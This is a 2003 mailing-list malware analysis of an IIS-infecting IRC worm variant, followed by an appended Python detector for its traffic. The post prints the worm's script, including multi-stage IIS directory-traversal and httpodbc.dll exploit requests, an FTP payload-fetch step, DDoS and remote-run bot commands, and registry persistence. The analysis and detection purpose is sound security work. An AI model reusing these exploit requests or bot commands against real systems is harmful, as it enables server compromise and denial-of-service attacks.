Re: www.google.com reference in directory-traversal attack

From: Paul Dokas (dokascs.umn.edu)
Date: Mon Jul 14 2003 - 22:21:00 CDT


On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002yahoo.com> wrote:
>
>
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> attack3.dump=1.6kb

It's either this:

  http://www.gdgsoft.com/info/notes/gsfxalert.asp

or a very close relative. This beastie swept through my networks and
has caused quite a few machines to become infected.

The variant that I've got creates:

 C:\WINNT\SYSTEM32\dfg ghj\loi gty\

which contains this:

  CLS.BAT
  DATA.BAK
  DEXE.CPL
  FSLX.EXE
  KLSYS.EXE
  NEXE.CPL
  PLUG.DLL
  PSC32.EXE
  SYSTL.EXE
  TSYSL.BAT
  WINSE.EXE

It appears to be a more recent version of W32.Randon.worm:

  http://vil.nai.com/vil/content/v_100097.htm

with quite a few "improvements" like a much larger dictionary, and
it doesn't seem to be detected by several of the larger anti-virus
packages (I might add that clamd *does* find this one as W32.Mix).
Oh, and it's got DDoS capabilities.

Here's the top bit of `strings PLUG.DLL`:

  on *:START:{
    run systl.exe /n /fh winsck
    sconf
    inc %many
    if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR }
  alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 }
  on *:TEXT:*:*: {
    if ($nick isop $rds(sc)) {
      if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } }
      if ($1 = !ntreg) { reg $2- }
      if ($1 = !ntstop) { ntstop }
      if ($1 = !dde) { /dde $2 command "" / $+ $3- }
      if ($1 = !ind) { .identd on $2- }
      if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- }
      if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 }
      if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy! | /fserve $nick 3 $2 }
      if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym
  14DDoS
  14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic }
      if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym
  14DDoS
  14 packeting halted! }
      if ($1 = !run) && ($2 != $null) { /run $2- }
      if ($1 = !icmp) { if ($2 == $null) { /saym
  rror
  yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " }
      if ($1 = !Clone) { /clone $2- }
      if ($1 = !syn) { if ($2 !== $null) { saym
  .
  .
  .

and so it goes for 692 lines. The odd HTTP connects that you saw were from
the very end of PLUG.DLL:

  alias sconf {
    .ddeserver on gtt1wst3r1.4.2
    .nick [_ $+ $r(1000,99999) $+ ]]
    .n0clone
    .Cona
    .timercheck 0 10 Cona
    .timerh1dd3 -o 0 1 H1dd3
    .timers33 -o 0 1 s33
    .timerregs -o 0 1 regs
    .run systl.exe /n /fh /r cls.BAT
    .timerkillsofts -o 0 5 killsofts
  alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
  on\Run\salfx,$mircdirklsys.exe,REG_SZ) } }
  alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } }
  alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } }
  on *:SOCKOPEN:Sg1.*: {
    sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg1.*: {
    sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
  on *:SOCKOPEN:Sg2.*: {
    saym
  IIS Exploit
  ATTEMPTING STAGE 2
    sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+
>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg2.*: {
    saym
  IIS Exploit
  STAGE 2 COMPLETE
  sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
  on *:SOCKOPEN:Sg3.*: {
    saym
  IIS Exploit
  ATTEMPTING STAGE 3
    sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg3.*: {
    saym
  IIS Exploit
  STAGE 3 COMPLETE

An infected host will join an IRC channel on rul3z.q8hell.org and
sit waiting for instructions. The host will also start scanning
for Windows shares that it can infect. It appears to also use
a fairly large dictionary in an attempt to guess passwords on any shares
that it finds. And finally, the infected host will start scanning for
IIS web servers to infect.

Paul
--
Paul Dokas dokascs.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."
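The original question was why an IIS request carries a fixed "Host: www.google.com" header. As an added example (not from the post or from the worm), here is a Python checker that flags the traits visible in the PLUG.DLL requests quoted above: double percent-encoding (%255c), traversal into system32/cmd.exe, the httpodbc.dll ISAPI call, and a Host header that does not match the destination address. The sample requests are constructed from the quoted script, with x.exe standing in for $rds(sf) and 192.0.2.10 as an assumed destination.

```python
import re
from urllib.parse import unquote

# Constructed samples: the request lines the worm's PLUG.DLL sends (rebuilt
# from the quoted script above), plus one ordinary request for contrast.
SAMPLE_REQUESTS = [
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32"
    "\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1\r\n"
    "Host: www.google.com\r\nConnection: keep-alive\r\n\r\n",
    "GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32"
    "%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Cx.exe HTTP/1.1\r\n"
    "Host: www.google.com\r\nConnection: keep-alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nConnection: keep-alive\r\n\r\n",
]

def full_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing; return (decoded, rounds).
    Needing more than one round means the URL was double-encoded."""
    rounds = 0
    while rounds < max_rounds:
        d = unquote(s)
        if d == s:
            break
        s, rounds = d, rounds + 1
    return s, rounds

def analyze_request(raw, dst_host):
    """Return a list of findings for one raw HTTP request as seen on the wire.
    dst_host is the address the packet was actually sent to (from the capture)."""
    findings = []
    lines = raw.split("\r\n")
    m = re.match(r"(\w+)\s+(\S+)\s+HTTP/\d\.\d", lines[0])
    if not m:
        return ["unparseable request line"]
    target, rounds = full_decode(m.group(2))
    target = target.replace("\\", "/").lower()   # IIS treats \ like /
    if rounds > 1:
        findings.append("double-encoded URL (IIS decode bug pattern)")
    if "../" in target:
        findings.append("directory traversal")
    if "cmd.exe" in target or "/system32/" in target:
        findings.append("system32/cmd.exe reference in URL")
    if "httpodbc.dll" in target and "mfcisapicommand" in target:
        findings.append("httpodbc.dll ISAPI abuse")
    headers = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
    host = headers.get("Host", "")
    if host and host.lower() != dst_host.lower():
        findings.append(f"Host header {host!r} does not match destination {dst_host!r}")
    return findings
```

The Host mismatch alone is weak evidence (virtual hosting, proxies), but combined with the decode-count and traversal checks it separates this worm's traffic from ordinary requests in a capture.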